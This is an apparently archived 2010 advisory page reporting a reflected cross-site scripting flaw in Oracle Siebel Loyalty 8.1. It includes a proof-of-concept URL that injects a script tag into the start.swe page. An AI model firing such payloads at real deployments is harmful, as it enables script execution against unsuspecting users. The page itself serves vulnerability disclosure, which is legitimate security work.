Oracle Siebel Loyalty 8.1 cross site scripting

2010.02.28
Credit: thebluegenius
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

-------------------------------------------------------------------- # Exploit Title: Oracle Siebel Loyalty 8.1 XSS Vulnerability # Date: 24 Feb 2010 # Author: thebluegenius # Software Link: http://bit.ly/bZ7JdV # Version: 8.1 # CVE : NA --------------------------------------------------- "Oracle Siebel Loyalty 8.1 XSS Vulnerability. --------------------------------------------------- By :Thebluegenius. Email :rajsm@isac.org.in Blog :www.thebluegenius.com. --------------------------------------------------- Description: Siebel Loyalty Management provides a unique multi-channel and multi-partner solution that allows organizations to transform loyalty program effectiveness and significantly increase customer retention and value. It supports the entire loyalty marketing lifecycle and includes deep industry and best practices support for member enrollment and management, points accrual and redemption, personalized loyalty promotions and member communications, multi-channel customer care, and cross-industry partner management. ------------------ Vulnerability: XSS ------------------ The start.swe page is affected by the vulnerability. you can execute XSS as given below: http://server/loyalty_enu/start.swe/%3E%22%3E%3Cscript%3Ealert('Reflected%20XSS')%3C/script%3E ----------------------------------------------------- Greetz Fly Out to: 1] Amforked() : My good friend 2] Aodrulez : for inspiring me 3] www.Orchidseven.com : for Research 4] www.isac.org.in


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top